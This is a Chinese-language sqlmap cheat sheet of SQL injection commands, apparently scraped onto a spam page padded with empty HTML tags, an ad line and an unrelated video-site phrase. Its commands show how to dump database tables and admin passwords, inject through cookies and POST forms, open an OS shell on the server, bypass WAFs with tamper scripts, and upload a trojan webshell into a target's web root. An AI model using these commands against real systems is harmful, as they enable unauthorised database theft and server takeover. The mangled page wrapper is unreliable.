<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                合規國際互聯網加速 OSASE為企業客戶提供高速穩定SD-WAN國際加速解決方案。 廣告
                **參數解釋** 星號 在注入的過程中,有時候是偽靜態的頁面,可以使用星號表示可能存在注入的部分 --data 使用post方式提交的時候,就需要用到data參數了 -p 當我們已經事先知道哪一個參數存在注入就可以直接使用-p來指定,從而減少運行時間 --level 不同的level等級,SQLMAP所采用的策略也不近相同,當–level的參數設定為2或者2以上的時候,sqlmap會嘗試注入Cookie參數;當–level參數設定為3或者3以上的時候,會嘗試對User-Angent,referer進行注入。 --random-agent 使用該參數,SQLMAP會自動的添加useragent參數,如果你知道它要求你用某一種agent,你也應當用user-agent選項自己指定所需的agent --technique 這個參數可以指定SQLMAP使用的探測技術,默認情況下會測試所有的方式。 支持的探測方式如下: B: Boolean-based blind SQL injection(布爾型注入) E: Error-based SQL injection(報錯型注入) U: UNION query SQL injection(可聯合查詢注入) S: Stacked queries SQL injection(可多語句查詢注入) T: Time-based blind SQL injection(基于時間延遲注入) **Access注入** sqlmap -u 注入點url //判斷是否有注入 sqlmap -u 注入點url --tables //access直接猜表 sqlmap -u 注入點url --colums -T admin //爆出admin表,猜解它的字段 sqlmap -u 注入點url --dump -T admin -C "username,password" //猜字段內容 **MySQL數據庫注入** sqlmap -u url --dbs //獲取數據庫 sqlmap -u url -D 指定的數據庫 --tables //獲取數據庫中的表 sqlmap -u url -D 指定的數據庫 -T 表名 --columns //獲取表字段 sqlmap -u url -D 指定的數據庫 -T 表名 -C id,user,pass --dump //獲取字段內容 **Cookie注入** 網站有判斷,不讓用and,update等參數時就得加上Cookie。 sqlmap -u url --cookie="cookie值" --dbs(或)--tables --level 2 **POST表單注入** 注入點: http://testasp.vulnweb.com/Login.asp **幾種方式:** sqlmap -r burp攔截數據.txt -p Pass(測試參數) //從文件讀取數據包 sqlmap -u http://testasp.vulnweb.com/Login.asp --forms //自動搜索表單 sqlmap -u http://testasp.vulnweb.com/Login.asp --data "Name=1&Pass=1" //手動添加數據 **獲取系統交互shell** 1.sqlmap -u http://url.. --os-shell //或者windows可以用--os-cmd 或--sql-shell 2.選擇網站服務端語言 3.填寫網站根目錄C:/www/ **偽靜態注入** sqpmap -u http://victim.com/id/666*.html --dbs //在html擴展名前加個'*' **請求延時** Web防注入措施,在訪問兩次錯誤頁面后,第三次必須訪問正確的頁面 --delay 2 //延時兩秒訪問 --safe-freq 30 //人為配置次數 **繞過WAF防火墻** sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py" //使用tamper腳本繞過 類似腳本 space2hash.py base64encode.py charencode.py **file參數使用** 必須為dba權限 sqlmap -u url --is-dba //查看是否dba權限 sqlmap -u url --file-write=本地木馬路徑(D:/shell.php) --file-dest=目標根目錄(C:/www/shell.php) **常用tamper腳本使用** 地址:http://mp.weixin.qq.com/s/vEEoMacmETUA4yZODY8xMQ
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看